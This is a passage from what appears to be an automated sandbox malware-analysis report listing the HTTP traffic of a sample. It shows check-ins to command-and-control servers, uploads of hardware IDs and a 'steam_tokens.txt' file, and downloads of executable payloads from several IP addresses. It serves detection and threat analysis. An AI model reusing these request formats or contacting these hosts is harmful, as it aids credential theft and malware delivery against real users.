3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="file"------IDAKJKEHDBGHIDHIEHDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"ybncbhylepme------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/1521297942/n4e23hz.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013545001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013551001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013556001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013557001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build"stok------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013558001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013559001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="build"stok------BFIJKEBFBFHIJJKEHDHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Mon, 09 Dec 2024 22:35:01 GMTIf-None-Match: "67577095-1db600"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013560001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"stok------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
